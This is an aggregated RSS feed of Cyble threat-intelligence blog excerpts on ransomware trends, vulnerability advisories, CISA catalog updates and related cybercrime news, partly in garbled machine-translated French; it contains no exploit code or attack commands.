This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2025-05-10T20:22:18+00:00 www.secnews.physaphae.fr Cyble - CyberSecurity Firm Global ransomware attacks in April 2025 declined to 450 from 564 in March – the lowest level since November 2024 – as major changes among the leading Ransomware-as-a-Service (RaaS) groups caused many affiliates to align with new groups. Still, the long-term trend for ransomware attacks remains decidedly upward (chart below) so April\'s decline could be reversed as soon as new RaaS leaders are established.  ~ Rasomware attacks by month 2021-2025 For now, the uncertainty at RansomHub – which went offline at the start of April but plans to return – resulted in new groups taking over the top global attack spots. Qilin, which gained affiliates from the RansomHub uncertainty, led all groups with 74 attacks claimed in April (chart below), followed by Akira at 70, Play with 50, Lynx with 31 attacks, and NightSpire at 24. ]]> 2025-05-06T14:17:39+00:00 https://cyble.com/blog/qilin-tops-april-2025-ransomware-report/ www.secnews.physaphae.fr/article.php?IdArticle=8672355 False Ransomware,Malware,Vulnerability,Threat,Industrial,Prediction,Medical,Cloud,Technical None 2.0000000000000000 Cyble - CyberSecurity Firm Overview Cyble\'s vulnerability intelligence unit examined 26 vulnerabilities and 14 dark web exploit claims in recent reports to clients and flagged 10 of the vulnerabilities as meriting high-priority attention by security teams. The vulnerabilities, which can lead to system compromise and data breaches, affect Fortinet products, WordPress plugins, Linux and Android systems, and more. The Top IT Vulnerabilities Here are some of the vulnerabilities highlighted by Cyble vulnerability intelligence researchers in recent reports. CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762 are critical vulnerabilities in Fortinet FortiGate devices that have been actively exploited to gain unauthorized remote access. CVE-2022-42475 is a heap-based buffer overflow vulnerability in the SSL-VPN component that allows remote code execution, while the other two enable initial access and privilege escalation. Recently, Fortinet revealed that attackers exploited these vulnerabilities to gain initial access and then used a novel post-exploitation technique to maintain persistent read-only access even after patches were applied. This technique involves creating a symbolic link (symlink) in the SSL-VPN language files folder that connects the user file system to the root file system, allowing attackers to evade detection and continue accessing device configurations. CVE-2024-48887 is a critical unverified password change vulnerability in the Fortinet FortiSwitch GUI that could allow a remote, unauthenticated attacker to change adminis]]> 2025-04-21T12:33:13+00:00 https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ www.secnews.physaphae.fr/article.php?IdArticle=8665658 False Tool,Vulnerability,Threat,Patching,Mobile None 3.0000000000000000 Cyble - CyberSecurity Firm Présentation Selon un nouveau rapport Cyble, les hacktivistes vont de plus en plus au-delà des activités traditionnelles telles que les attaques DDOS et les défaillances de sites Web en infrastructure critique plus sophistiquée et attaques de ransomwares. Dans un rapport pour les clients, Cyble a déclaré que le hacktivisme s'est «transformé en un instrument complexe de guerre hybride» avec la montée en puissance des groupes qui ont adopté des techniques d'attaque plus sophistiquées plus généralement associées aux acteurs de l'État-nation et aux groupes de menaces motivés financièrement. Hacktivism "ne se limite plus aux explosions idéologiques marginales", selon le rapport. «Il s'agit maintenant d'un appareil de cyber-insurrection décentralisé, capable de façonner les récits géopolitiques, de déstabiliser les systèmes critiques et de s'engager directement dans des conflits mondiaux à travers le domaine numérique.» Le rapport CYBLE a examiné les groupes hacktiviste les plus actifs au premier trimestre de 2025, les nations et les secteurs les plus ciblés, les techniques d'attaque émergentes, et plus encore. Les groupes hacktiviste les plus actifs ciblent l'infrastructure critique Les hacktivistes pro-russes étaient les plus actifs au premier trimestre, dirigés par NONAME057 (16), Hacktivist Sandworm]]> 2025-04-15T08:22:39+00:00 https://cyble.com/blog/hacktivists-infrastructure-move-into-ransomware/ www.secnews.physaphae.fr/article.php?IdArticle=8662999 False Ransomware,Tool,Vulnerability,Threat,Legislation,Industrial,Prediction,Cloud,Technical APT 44 3.0000000000000000 Cyble - CyberSecurity Firm ]]> 2025-04-10T05:20:09+00:00 https://cyble.com/blog/ics-vulnerability-report-energy-cyble/ www.secnews.physaphae.fr/article.php?IdArticle=8661332 False Tool,Vulnerability,Threat,Patching,Industrial,Medical,Commercial None 3.0000000000000000 Cyble - CyberSecurity Firm , ou contrôle complet des applications." le top it vulnérabilités Voici les huit vulnérabilités mises en évidence par Cyble dans les rapports récents. cve-2025-2783 est encore non classé vulnerability Avant la version 134.0.6998.177, où une poignée incorrecte fournie dans des circonstances non spécifiées à Mojo permet à un attaquant distant d'effectuer une évasion de bac à sable via un fichier malveillant. Les chercheurs ont rapporté que la vulnérabilité avait été exploitée pour déployer malware Dans les attaques d'espionnage ciblant les médias russes et les organisations d'éducation. CVE-2025-22230 est une vulnérabilité d'authentification ByPass provoquée par un contrôle d'accès in]]> 2025-04-07T17:06:04+00:00 https://cyble.com/blog/it-vulnerability-microsoft-fixes-urged-by-cyble/ www.secnews.physaphae.fr/article.php?IdArticle=8660778 False Tool,Vulnerability,Threat,Patching None 3.0000000000000000 Cyble - CyberSecurity Firm March a vu des événements notables, y compris un changement potentiel au sommet du monde des ransomwares, des attaques persistantes et de l'émergence de nouveaux groupes. mars 2025 s'est terminé sur une note surprenante lorsque le site de fuite de données basé sur l'oignon (DLS) de RansomHub - le plus grand groupe de ransomware au cours de la dernière année - s'est hors ligne, alimentant la spéculation d'une éventuelle prise de contrôle. Quelques jours plus tard, rival dragonforce a prétendu pour avoir pris le contrôle de l'infrastructure de RansomHub \\, la collecte du potentiel pour un changement majeur dans le paysage ransomatique dans les mois. À une époque où les attaques de ransomware restent à des niveaux record Ransomware-as-a-Service (RAAS) Groupes du package et livrez des logiciels malveillants. Il n'est pas encore clair si la course de RansomHub \\ est terminée, mais le groupe Raas a connu une course remarquable au cours de la dernière année, sa puissance de suspension par les perceptions d'une plus grande transparence que les groupes prédécesseurs, les paiements prévisibles et les play-books d'attaque bien emballés pour les affiliés, dans l'analyse Cyble \ 'S Les attaques de ransomware restent élevées ransomware Les niveaux record de février, mais ils restent toujours au-dessus d]]> 2025-04-04T08:22:37+00:00 https://cyble.com/blog/ransomware-attack-levels-remain-high-as-major-change-looms/ www.secnews.physaphae.fr/article.php?IdArticle=8660196 False Ransomware,Malware,Vulnerability,Threat,Cloud None 3.0000000000000000 Cyble - CyberSecurity Firm aperçu Les vulnérabilités dans les produits Ivanti, les caméras IP AVTech et les plugins WordPress ont récemment fait partie des dizaines de tentatives d'exploitation détectées par des capteurs de pot de miel Cyble.  Les tentatives d'attaque ont été détaillées dans les rapports hebdomadaires de Sensor Intelligence de la Menage Intelligence Company \\. Les rapports CYBLE ont également examiné les attaques persistantes contre les systèmes Linux et les appareils de réseau et de réseau, alors que les acteurs de la menace scarchent des appareils vulnérables pour ransomware href = "https://cyble.com/knowledge-hub/what-is-ddos-attack/" Target = "_ Blank" rel = "noreferrer noopener"> ddos ​​ et des botnets d'exploration de crypto. Les rapports ont également examiné les logiciels malveillants bancaires, les attaques brutes-force, les ports vulnérables et phishing campagnes.  Voici quelques-unes des campagnes d'attaque récentes couvertes dans les rapports de capteurs Cyble. Les utilisateurs pourraient être vulnérables à l'attaque si les versions de produits affectées ne sont pas corrigées et atténuées.  Exploits de vulnérabilité détectés par cyble ivanti vulnérabilité s Voici quelques-unes des vulnérabilités ciblées dans les récentes tentatives d'attaque détect�]]> 2025-03-25T09:36:32+00:00 https://cyble.com/blog/cyble-sensors-detect-exploit-attempts-on-ivanti-avtech-ip-cameras/ www.secnews.physaphae.fr/article.php?IdArticle=8658054 False Malware,Vulnerability,Threat,Patching,Industrial None 2.0000000000000000 Cyble - CyberSecurity Firm Social Engineering Campagne contre les développeurs de dissociation en déguisé malin github . À l'aide d'un faux test de recrutement nommé " FizzBuzz ", le TA tourne les victimes de télécharger un fichier ISO contenant un apparemment inoffensif javascript Exercice et un LNK malivet shortcut]]> 2025-03-24T11:09:37+00:00 https://cyble.com/blog/fake-coding-challenges-steal-sensitive-data-via-fogdoor/ www.secnews.physaphae.fr/article.php?IdArticle=8657753 False Malware,Tool,Vulnerability,Threat,Technical None 3.0000000000000000 Cyble - CyberSecurity Firm aperçu Le rapport hebdomadaire sur les informations sur la vulnérabilité aux clients met en lumière les plus pressants cybersecurity vulnérabilités qui ont été identifiées et exploitées. Ce rapport hebdomadaire sur les informations sur la vulnérabilité met en évidence les efforts continus des organisations pour protéger leurs systèmes et réseaux de cyber-menaces , se concentrant sur la critique Vulnérabilités qui exigent une attention immédiate des professionnels de la sécurité. Notamment, la Cybersecurity and Infrastructure Security Agency (CISA) a mis à jour son catalogue de vulnérabilité exploité (KEV) connu pour inclure plusieurs défauts de haute sévérité qui sont activement ciblés par les attaquants. Au cours de la semaine du 12 mars 2025, CISA a ajouté plusieurs vulnérabilités à son catalogue KEV, reflétant des préoccupations croissantes concernant l'exploitation hyperactive. Parmi ceux-ci, CVE-2025-30066 s'est démarquée comme une menace grave, impliquant une authentification Bypass Vulnerabilité dans l'action de github TJ-Ractions / SPOGE-FILES. Ce défaut permet aux attaquants d'exécuter un code arbitraire sur les systèmes affectés en exploitant une mauvaise validation dans le ]]> 2025-03-21T10:36:30+00:00 https://cyble.com/blog/cyble-weekly-vulnerability-insights-report/ www.secnews.physaphae.fr/article.php?IdArticle=8657158 False Tool,Vulnerability,Threat,Patching,Prediction None 3.0000000000000000 Cyble - CyberSecurity Firm vulnérabilités trouvés dans les systèmes de gestion de l'énergie et de cardiologie de l'énergie solaire. Vulnérabilités ICS critiques Cyble a noté que Vulnérabilités Dans Sungrow Isolarcloud "sont parmi les importants car ils ont un impact sur les systèmes de gestion de l'énergie critiques." L'application Android et le micrologiciel A]]> 2025-03-21T10:12:55+00:00 https://cyble.com/blog/ics-vulnerability-report-solar-fixes-urged-by-cyble/ www.secnews.physaphae.fr/article.php?IdArticle=8657159 False Tool,Vulnerability,Patching,Mobile,Industrial,Medical,Commercial None 2.0000000000000000 Cyble - CyberSecurity Firm CVE-2025-1316 Cette vulnérabilité, identifiée le 4 mars 2025, est une vulnérabilité d'injection de commande OS qui permet aux attaquants d'exécuter à distance des commandes arbitraires sur l'appareil.   L'Edimax IC-7100 ne neutralise pas correctement les caractères spéciaux utilisés dans les commandes OS, le laissant ouvert à l'exploitation. malveillant Les acteurs peuvent élaborer des demandes spécifiques pour injecter un code malveillant dans le système d'exploitation de l'appareil photo \\, menant à l'exécution du code à distance et à l'accès inédite à l'appareil.  L'impact de cette vulnérabilité est grave, car il permet aux attaquants de prendre le contrôle de l'appareil, d'accès potentiellement à des données de surveillance vidéo sensibles ou de compromettre le réseau. Un score CVSS V4 de 9,3 a été attribué au CVE-2025-1316, indiquant la nature critique du défaut.   CISA recommande fortement que les organisations utilisant les caméras IP Edimax IC-7100 prennent des mesures immédiates pour atténuer le risque, y compris l'isolement du réseau, l'utilisation de ]]> 2025-03-20T14:07:29+00:00 https://cyble.com/blog/cisa-adds-cve-2025-1316-and-other-flaws/ www.secnews.physaphae.fr/article.php?IdArticle=8656938 False Vulnerability,Threat,Legislation None 3.0000000000000000 Cyble - CyberSecurity Firm Overview  The Europol released the EU-SOCTA 2025 report, which offers a comprehensive look into the complex dynamics shaping serious and organized crime across Europe.  Europol\'s analysis provides insight into the increasing intersection of cybercriminal activities, hybrid threats, and the exploitation of emerging technologies. Criminals are rapidly adapting to digital advancements, using technology to expand their reach, enhance their capabilities, and evade law enforcement, the reports said.  Hybrid Threats: A Blurring of Crime and Conflict  Hybrid threats, which combine conventional criminal methods with advanced digital strategies, present significant risks. These tactics destabilize societies, exploit critical infrastructures, and create uncertainty.   Criminal organizations now leverage methods traditionally associated with state-backed actors, including disinformation campaigns, targeted cyberattacks, and manipulation of public opinion. By exploiting vulnerabilities of interconnected systems, these actors disrupt supply chains, compromise sensitive data, and manipulate information on a large scale.  The blending of state-backed espionage and organized crime blurs the line between geopolitical conflict and tra]]> 2025-03-20T14:02:25+00:00 https://cyble.com/blog/hybrid-threats-eu-socta-2025-report/ www.secnews.physaphae.fr/article.php?IdArticle=8656939 False Malware,Tool,Vulnerability,Threat,Legislation,Medical None 2.0000000000000000 Cyble - CyberSecurity Firm 2025-03-19T12:49:21+00:00 https://cyble.com/blog/cisa-alerts-users-of-cve-2025-24472/ www.secnews.physaphae.fr/article.php?IdArticle=8656685 False Tool,Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm 2025-03-19T08:35:18+00:00 https://cyble.com/blog/cert-nz-warns-of-cve-2025-24813-in-tomcat/ www.secnews.physaphae.fr/article.php?IdArticle=8656638 False Vulnerability,Threat None 2.0000000000000000 Cyble - CyberSecurity Firm Overview Zimbra Collaboration Suite (ZCS) is a widely used email and collaboration platform. Security remains a top priority for administrators and users who rely on Zimbra for business communication. Recently, Zimbra has addressed several critical security issues, including stored cross-site scripting (XSS), SQL injection (SQLi), and server-side request forgery (SSRF). This article provides a detailed technical breakdown of these vulnerabilities, their potential impact, and recommended actions. Below is an in-depth analysis of these vulnerabilities. 1. Stored Cross-Site Scripting (XSS) - CVE-2025-27915 Affected Versions: ZCS 9.0, 10.0, and 10.1 (before patches 44, 10.0.13, and 10.1.5) Patch Availability: Fixed in the latest patches Description: This vulnerability resides in the Classic Web Client due to insufficient sanitization of HTML content in ICS calendar invite files. Attackers can embed malicious JavaScript inside an ICS file, which executes when a victim opens an email containing the ICS entry. Exploitation allows unauthorized actions within the victim\'s session, such as modifying email filters to redirect messages to an attacker\'s inbox. ]]> 2025-03-18T13:50:51+00:00 https://cyble.com/blog/breaking-down-zimbras-latest-security-threats/ www.secnews.physaphae.fr/article.php?IdArticle=8656463 False Vulnerability,Industrial,Technical None 2.0000000000000000 Cyble - CyberSecurity Firm 2025-03-18T13:33:57+00:00 https://cyble.com/blog/it-vulnerability-report-for-apple-php-flaws/ www.secnews.physaphae.fr/article.php?IdArticle=8656464 False Vulnerability,Threat,Patching None 2.0000000000000000 Cyble - CyberSecurity Firm Le FBI et l'Agence américaine de sécurité de la cybersécurité et de l'infrastructure (CISA) ont publié un avis bien à la fois sur le groupe Ransomware Medusa la semaine dernière, car Cyble a détecté une accélération dans les activités du groupe au cours des derniers mois. medusa Ransomware Attacks ont été un événement presque quotidien jusqu'à présent, fonctionnant près de 45% plus élevé que les niveaux d'attaque du groupe \\ 2024, selon Cyble Threat Intelligence Données. Le cisa-fbi consultatif Examine le groupe Ransomware-as-a-Service (RAAS) du groupe, des techniques, des techniques et des procédures (TTPS). (IOCS), mitre att & ck Techniques, et plus, basé sur des enquêtes récentes du FBI. Les attaques de ransomwares Medusa ont augmenté en février Cyble a enregistré 60 victimes de ransomwares de méduse au cours des 72 premiers jours de 2025, à un rythme de plus de 300 attaques cette année. Ce serait considérablement à partir des 211 attaques de ransomwares MEDUSA enregistrées par Cyble en 2024. Le volume d'attaque a culminé en février, avec 33 victimes revendiquées par le groupe au cours du mois de 28 jours. Février était un mois record pour les attaques de ransomware en général, comme enregistré par les données Cyble. Cyble a e]]> 2025-03-17T11:01:48+00:00 https://cyble.com/blog/medusa-ransomware-surges-as-fbi-share-insight/ www.secnews.physaphae.fr/article.php?IdArticle=8656193 False Ransomware,Tool,Vulnerability,Threat,Patching,Mobile,Medical None 3.0000000000000000 Cyble - CyberSecurity Firm 2025-03-13T11:35:12+00:00 https://cyble.com/blog/apple-releases-security-updates-and-rapid-security-responses-for-march-2025/ www.secnews.physaphae.fr/article.php?IdArticle=8655515 False Vulnerability,Mobile None 3.0000000000000000 Cyble - CyberSecurity Firm 2025-03-13T09:55:19+00:00 https://cyble.com/blog/enisa-nis2-cybersecurity-maturity-report/ www.secnews.physaphae.fr/article.php?IdArticle=8655491 False Tool,Vulnerability,Legislation,Cloud,Commercial None 2.0000000000000000 Cyble - CyberSecurity Firm aperçu L'Agence de sécurité de la cybersécurité et de l'infrastructure (CISA) a récemment mis à jour son catalogue connu sur les vulnérabilités exploitées (KEV) en ajoutant cinq vulnérabilités exploitées par les cybercriminels.   Ces nouvelles entrées mettent en évidence les défauts critiques dans les systèmes logiciels largement utilisés, y compris ceux qui ont un impact sur le Veracore Advantive et Ivanti Endpoint Manager (EPM).   L'identification de ces vulnérabilités met l'accent Cybersecurity Les risques pour les stratégies fédérales et privées, ainsi que la nécessité de l'urg des organisations.  Dans le cadre de ses efforts en cours pour protéger les infrastructures critiques, CISA a mis en évidence le ]]> 2025-03-12T15:03:52+00:00 https://cyble.com/blog/cisa-adds-5-flaws-to-kev-catalog/ www.secnews.physaphae.fr/article.php?IdArticle=8655309 False Tool,Vulnerability,Threat,Patching None 2.0000000000000000 Cyble - CyberSecurity Firm Les capteurs de pot de miel cyble ont également détecté des tentatives d'attaque sur les vulnérabilités connues pour être ciblées par les groupes APT. Présentation Les capteurs de pot de miel Cyble ont détecté des dizaines de vulnérabilités ciblées dans les tentatives d'attaque ces dernières semaines, y compris certains connus pour être ciblés par des groupes avancés de menace persistante (APT). wordpress plugins , les appareils de réseau et les feux de file le Cyble Reports ont également examiné les attaques persistantes contre les systèmes liux et les appareils de réseau et IoT alors que les acteurs de menace continuent de scanner des appareils vulnérables pour ransomware attaque et pour ajouter à ddos ​​ et les botneaux de mine du crypto. Les rapports ont également examiné les logiciels malveillants bancaires, les attaques par force brute, les ports vulnérables et phishing campagnes. Voici quelques-unes des campagnes d'attaque récentes couvertes dans les rapports de capteurs Cyble. Les utilisateurs pourraient être vulnérables aux attaques si les versions du produit affectées ne sont pas corrigées et atténuées. Tentatives d'attaque du plugin wordpress ]]> 2025-03-11T07:42:54+00:00 https://cyble.com/blog/cyble-sensors-wordpress-plugins-network-devices/ www.secnews.physaphae.fr/article.php?IdArticle=8654957 False Malware,Vulnerability,Threat,Patching,Mobile,Cloud None 3.0000000000000000 Cyble - CyberSecurity Firm 2025-03-10T12:10:47+00:00 https://cyble.com/blog/three-vmware-zero-days-under-active-exploitation/ www.secnews.physaphae.fr/article.php?IdArticle=8654866 False Vulnerability,Threat,Patching,Cloud,Technical None 2.0000000000000000 Cyble - CyberSecurity Firm 2025-03-10T09:02:21+00:00 https://cyble.com/blog/ics-vulnerability-cctv-rtos-and-genome-systems/ www.secnews.physaphae.fr/article.php?IdArticle=8654832 False Tool,Vulnerability,Threat,Patching,Industrial,Medical,Commercial None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The latest Weekly Vulnerability Insights Report to clients sheds light on the critical vulnerabilities that were identified between February 26, 2025, and March 4, 2025. During this period, the Cybersecurity and Infrastructure Security Agency (CISA) incorporated nine new vulnerabilities into their Known Exploited Vulnerabilities (KEV) catalog, underlining the escalating risks posed by these security flaws. These vulnerabilities primarily affect prominent vendors like VMware, Progress, Microsoft, Hitachi Vantara, and Cisco, raising concerns about their potential exploitation. Among the vulnerabilities featured, CVE-2024-7014 and CVE-2025-21333 have gained notable attention due to their severe nature. Both flaws allow attackers to escalate privileges or gain unauthorized access, and the availability of public Proof of Concepts (PoCs) has further heightened the risk of exploitation. With attackers leveraging these PoCs, the chances of successful cyberattacks have been amplified, making it crucial for organizations to address these vulnerabilities promptly. Critical Vulnerabilities of the Week The CRIL analysis highlights a mix of high-severity vulnerabilities, many of which have been weaponized by threat actors across underground forums. Here are some of the critical vulnerabilities and their potential impact: CVE-2025-22226 (VMware ESXi, Workstation, an]]> 2025-03-07T09:27:33+00:00 https://cyble.com/blog/weekly-vulnerability-insights-report/ www.secnews.physaphae.fr/article.php?IdArticle=8654494 False Tool,Vulnerability,Threat,Mobile None 2.0000000000000000 Cyble - CyberSecurity Firm U.S. Les actes d'accusation de 10 ressortissants chinois sont liés à des outils et méthodes de piratage et de phishing et de méthodes de la société et du réseau d'entreprises privées de la République de Chine (PRC). Un département américain de la Justice (DOJ) annonce des indications comprenant les dépistages de l'écran de certains i-\ \ \ 'Sovered Otinces Ofrecs, les indicex Uncellé Actes d'accusation Ajout de détails supplémentaires sur les méthodes et outils de la société \\. Les actes d'accusation facturent à huit employés de l'I-Soon et à deux responsables de la RPC avec complot en vue de commettre des intrusions informatiques et de complot en vue de commettre une fraude par fil. Les défendeurs restent en liberté. Schéma de piratage à 7 ans allégués Les actes d'accusation allèguent que I-Soon a agi sous la direction du ministère de la Sécurité des États (MSS) du PRC \\ et du ministère de la Sécurité publique (MPS). Le communiqué du ministère de la Justice a déclaré que MSS et les députés «ont utilisé un vaste réseau d'entreprises privées et d'entrepreneurs en Chine pour mener des intrusions informatiques non autorisées (« hacks ») aux États-Unis et ailleurs. L'une de ces sociétés privées était i-Soon. » De 2016 à 2023, le DOJ a déclaré que I-Soon et son personnel «se sont engagés dans le piratage nombreux et répandus des comptes de messagerie, des téléphones portables, des serveurs et des sites Web à la direction et en coordination étroite avec les MSS et MPS de PRC \\. I-SOON a généré des dizaines de millions de dollars de revenus et avait parfois plus de]]> 2025-03-07T08:41:16+00:00 https://cyble.com/blog/u-s-indictments-shed-light-on-i-soon-tools-methods/ www.secnews.physaphae.fr/article.php?IdArticle=8654481 False Malware,Tool,Vulnerability,Threat,Patching,Mobile,Cloud None 4.0000000000000000 Cyble - CyberSecurity Firm 2025-03-05T11:54:05+00:00 https://cyble.com/blog/february-sees-ransomware-attacks-new-data-shows/ www.secnews.physaphae.fr/article.php?IdArticle=8653797 False Ransomware,Tool,Vulnerability,Threat,Patching,Prediction None 3.0000000000000000 Cyble - CyberSecurity Firm 2025-03-04T13:07:26+00:00 https://cyble.com/blog/cisa-adds-new-exploited-vulnerabilities-to-catalog/ www.secnews.physaphae.fr/article.php?IdArticle=8653393 False Tool,Vulnerability,Threat,Patching None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The UAE Cyber Security Council (CSC) has disclosed that the country faces over 200,000 cyberattacks daily, primarily targeting strategic sectors. These cyberterrorist attacks originate from 14 countries, with their perpetrators and attack launch sites identified and countered using advanced global cybersecurity measures. These attacks aim to disrupt critical infrastructure, steal sensitive data, and undermine national security. The CSC has implemented state-of-the-art threat detection and mitigation strategies to safeguard essential services and institutions from these cyber threats. Strategic Sectors Under Attack The CSC has reported that cyberterrorist groups primarily focus their attacks on key industries, aiming to disrupt operations and steal sensitive information. Among the affected sectors, the government sector accounted for the highest share at 30%, followed by the financial and banking sector at 7% and the education sector at 7%. Other affected industries, including technology, aviation, and hospitals, each experienced 4% of the attacks, while the remaining 44% were distributed among various other sectors. Cyberattack Types and Methods Cyberattacks come in various forms, each posing unique threats to digital infrastructure. The CSC identified several key attack types: Attacks on Information Technology and Infrastructure – 40% of total incidents File-sharing Attacks – 9% Database Vulnerabilities – 3% ]]> 2025-03-04T09:34:08+00:00 https://cyble.com/blog/uae-reports-200000-daily-attacks-from-global-terror-groups/ www.secnews.physaphae.fr/article.php?IdArticle=8653340 False Ransomware,Malware,Vulnerability,Threat None 2.0000000000000000 Cyble - CyberSecurity Firm . Le cyber999 Réponse des incidents Le centre rassemble activement l'intelligence et collabore avec des entités mondiales pour améliorer les défenses de la cybersécurité. Au Q4 2024, Cyber999 a enregistré 1 550 incidents , marquant une diminution de 4% à partir des 1 623 incidents au Q3 2024. Répartition des incidents par mois au Q4 2024: ]]> 2025-03-03T13:04:23+00:00 https://cyble.com/blog/fraud-and-ransomware-cybersecurity-report/ www.secnews.physaphae.fr/article.php?IdArticle=8652974 False Ransomware,Malware,Vulnerability,Threat,Legislation,Mobile,Prediction None 2.0000000000000000 Cyble - CyberSecurity Firm 2025-03-03T12:17:52+00:00 https://cyble.com/blog/it-vulnerability-mac-windows-fixes-urged-by-cyble/ www.secnews.physaphae.fr/article.php?IdArticle=8652975 False Malware,Tool,Vulnerability,Threat,Patching None 2.0000000000000000 Cyble - CyberSecurity Firm Overview CERT-In (Indian Computer Emergency Response Team) has issued a critical security advisory (CIVN-2025-0035) detailing several vulnerabilities affecting various F5 products. If exploited, these vulnerabilities could lead to security breaches, including arbitrary code execution, data theft, system downtime, and denial-of-service (DoS) attacks. The flaws impact a wide range of F5 solutions, which enterprises use to optimize application delivery, ensure high performance, and secure critical network services. Given the use of F5 products in mission-critical environments, the impact of these vulnerabilities can be severe, potentially jeopardizing the confidentiality, integrity, and availability of affected systems. The advisory highlights multiple security issues, including buffer overflows, session hijacking, and improper memory management. Organizations must act quickly to mitigate these risks. Affected F5 Products The vulnerabilities disclosed in CIVN-2025-0035 impact several F5 product families, including: BIG-IP Next (all modules) BIG-IP Next Central Manager BIG-IP Next SPK BIG-IP Next CNF BIG-IP 15.x, 16.x, 17.x BIG-IQ Centralized Management 8.x F5 Distributed Cloud (all services) ]]> 2025-02-28T10:49:00+00:00 https://cyble.com/blog/cert-security-vulnerabilities-in-f5-solutions/ www.secnews.physaphae.fr/article.php?IdArticle=8651927 False Vulnerability,Threat,Patching,Cloud None 2.0000000000000000 Cyble - CyberSecurity Firm Overview U.S. ransomware incidents in February have surged well beyond January\'s totals despite the significantly shorter month. According to Cyble data, ransomware attacks started in 2025, up 150% from the year-ago period, likely driven by the perception among ransomware groups that U.S. organizations are more likely to pay ransom. Canada, too, continues to experience elevated ransomware attacks, while other global regions have remained largely stable (chart below). That trend has continued through the month of February. According to Cyble data, the U.S. was hit by 372 ransomware attacks on February 27, well beyond the 304 attacks it saw for all of January 2025. Globally, ransomware attacks increased from 518 in January to 599 for the first 27 days of February, so the U.S. share of global ransomware attacks has also increased, from 58.7% to 62.1%. February ransomware attacks by country (Cyble) We\'ll look at what\'s behind the increase in ransomware attacks (hint: a big name returned in a big way), as well as other developments in the ransomware threat landscape this month. New Ransomware Groups Emerge Cyble documented the rise of three new ran]]> 2025-02-28T09:19:29+00:00 https://cyble.com/blog/u-s-ransomware-attacks-surged-again-in-february/ www.secnews.physaphae.fr/article.php?IdArticle=8651909 False Ransomware,Vulnerability,Threat,Patching,Legislation,Prediction,Medical None 3.0000000000000000 Cyble - CyberSecurity Firm Overview The weekly ICS vulnerabilities Intelligence Report to clients highlights the latest vulnerability landscape for ICS systems, derived from alerts by the Cybersecurity and Infrastructure Security Agency (CISA). This report covers vulnerabilities identified between February 19, 2025, and February 25, 2025, shedding light on the ongoing cybersecurity challenges faced by critical industries that rely on ICS technologies. During this period, CISA issued seven security advisories addressing vulnerabilities impacting multiple ICS products and vendors. These advisories for these ICS vulnerabilities cover vulnerabilities found in products from ABB, Siemens, Rockwell Automation, Rapid Response Monitoring, Elseta, Medixant, and others. ABB was the most affected vendor, reporting five critical vulnerabilities across its FLXEON Controllers, ASPECT-Enterprise, NEXUS, and MATRIX Series products. Publicly available proof-of-concept (PoC) exploits for the reported vulnerabilities have escalated the risk of active exploitation, making it essential for organizations to quickly address these security flaws through patching and mitigation measures. ICS Vulnerabilities by Vendor and Product Figure 1: Vulnerability Severity Category Chart The ICS vulnerabilities identified during this reporting period span a wide range of critical infrastructure systems. For instance, ABB reported multiple flaws in its FLXEON Controllers, ASPECT-Enterprise, NEXUS, and MATRIX Series products. These vulnerabilities inc]]> 2025-02-27T11:52:37+00:00 https://cyble.com/blog/new-cisa-report-rising-ics-cybersecurity-risks/ www.secnews.physaphae.fr/article.php?IdArticle=8651581 False Tool,Vulnerability,Patching,Industrial,Medical None 4.0000000000000000 Cyble - CyberSecurity Firm 2025-02-25T12:07:28+00:00 https://cyble.com/blog/cve-2024-21966-amd-flaw/ www.secnews.physaphae.fr/article.php?IdArticle=8650855 False Tool,Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm 2025-02-25T12:07:28+00:00 https://cyble.com/blog/cve-2024-21966-critical-amd-ryzen-master-utility-flaw-exposes-systems-to-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8650836 False Tool,Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm 2025-02-25T11:02:24+00:00 https://cyble.com/blog/cyble-cisa-required-for-adobe-and-oracle-products/ www.secnews.physaphae.fr/article.php?IdArticle=8650810 False Vulnerability,Threat,Patching None 3.0000000000000000 Cyble - CyberSecurity Firm Overview Juniper Networks, a leading provider of networking solutions, has recently issued a security advisory addressing a critical vulnerability affecting multiple Juniper Networks devices. This flaw could allow attackers to bypass authentication and gain administrative control over affected systems. Organizations relying on Juniper\'s Session Smart Routers, Session Smart Conductors, and WAN Assurance Managed Routers should take immediate action to secure their networks. Impact of the Vulnerability The vulnerability, identified as an Authentication Bypass Using an Alternate Path or Channel vulnerability, poses a significant security risk. If exploited, a network-based attacker could bypass authentication mechanisms and assume administrative privileges on the compromised device. This level of access could allow attackers to manipulate network configurations, intercept traffic, and disrupt operations in the event of a successful exploitation. Fortunately, Juniper Networks has not reported any cases of active exploitation. However, given the severity of the issue, organizations must act proactively to mitigate the risks. Affected Products The vulnerability affects multiple versions of the following Juniper Networks products: Session Smart Router: Versions 5.6.7 before 5.6.17, 6.0.8, 6.1 before 6.1.12]]> 2025-02-24T10:57:41+00:00 https://cyble.com/blog/major-security-flaw-in-juniper-networks-routers/ www.secnews.physaphae.fr/article.php?IdArticle=8650453 False Vulnerability,Patching,Cloud None 2.0000000000000000 Cyble - CyberSecurity Firm 2025-02-24T08:24:19+00:00 https://cyble.com/blog/fbi-cisa-shows-staying-power-of-old-vulnerabilities/ www.secnews.physaphae.fr/article.php?IdArticle=8650418 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching,Industrial None 3.0000000000000000 Cyble - CyberSecurity Firm Les allégations récentes des acteurs de la menace selon lesquelles ils ont obtenu une base de données Omnigpt Backend montrent les risques d'utilisation de données sensibles sur les plates-formes de chatbot AI, où les entrées de données pourraient potentiellement être révélées à d'autres utilisateurs ou exposées dans une violation.  Omnigpt n'a pas encore répondu aux affirmations, qui ont été faites par des acteurs de menace sur le site de fuite de BreachForums, mais les chercheurs sur le Web de Cyble Dark ont ​​analysé les données exposées.  Les chercheurs de Cyble ont détecté des données potentiellement sensibles et critiques dans les fichiers, allant des informations personnellement identifiables (PII) aux informations financières, aux informations d'accès, aux jetons et aux clés d'API. Les chercheurs n'ont pas tenté de valider les informations d'identification mais ont basé leur analyse sur la gravité potentielle de la fuite si les revendications tas \\ 'sont confirmées comme étant valides.   